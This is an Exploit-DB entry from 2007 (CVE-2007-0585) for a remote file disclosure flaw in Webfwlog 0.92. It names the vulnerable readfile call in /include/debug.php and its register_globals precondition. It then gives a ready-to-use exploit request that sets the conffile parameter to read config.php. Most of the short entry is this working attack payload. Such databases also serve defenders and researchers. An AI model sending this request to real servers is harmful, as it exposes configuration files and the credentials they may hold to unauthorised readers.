Webfwlog <= 0.92 debug.php Remote File Disclosure Vulnerability

2007-01-29T00:00:00
ID EDB-ID:3222
Type exploitdb
Reporter GoLd_M
Modified 2007-01-29T00:00:00

Description

Webfwlog <= 0.92 (debug.php) Remote File Disclosure Vulnerability. CVE-2007-0585. Webapps exploit for php platform

                                        
                                            ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ D.Script:ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-stable/All/webfwlog-0.92.tbz
+ D.Scrpit:http://webfwlog.sourceforge.net/
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ V.Code In : /include/debug.php | php.ini -&gt; register globals = on
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ readfile("$conffile");
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ 3xpl0!t
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ /include/debug.php?config[debug]=10&conffile=config.php
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Author:  GolD_M &lt;hacker_ [at] w.cn&gt;
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com       +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2007-01-29]